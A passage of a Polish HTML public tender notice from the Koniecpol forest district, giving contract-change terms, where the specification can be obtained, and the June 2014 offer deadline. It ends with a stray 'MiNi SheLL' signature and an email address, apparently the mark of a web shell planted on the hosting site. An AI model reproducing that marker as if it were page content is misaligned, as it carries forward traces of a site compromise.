                zamówienia, 
	konieczność powierzenia prac podwykonawcy jest wynikiem zmiany technologii robót lub 
                materiałów, 
	w przypadku opóźnień zapewni terminową realizację przedmiotu umowy. 
5) zmiany zakresu umowy spowodowanej następstwem działania organów administracji lub innych 
    podmiotów, związanych z odmową wydania decyzji, zezwoleń, uzgodnień, będących następstwem 
    okoliczności leżących po stronie Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koniecpol.katowice.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Różana 11, 42-230 Koniecpol - osobiście w siedzibie zamawiającego, pok. nr 17 - na pisemny wniosek zainteresowanego,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2014 godzina 08:00, miejsce: Oferty należy składać w zamkniętych kopertach w Sekretariacie Nadleśnictwa Koniecpol, 
ul. Różana 11, pok. nr 17 (Sekretariat), 42-230 Koniecpol.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com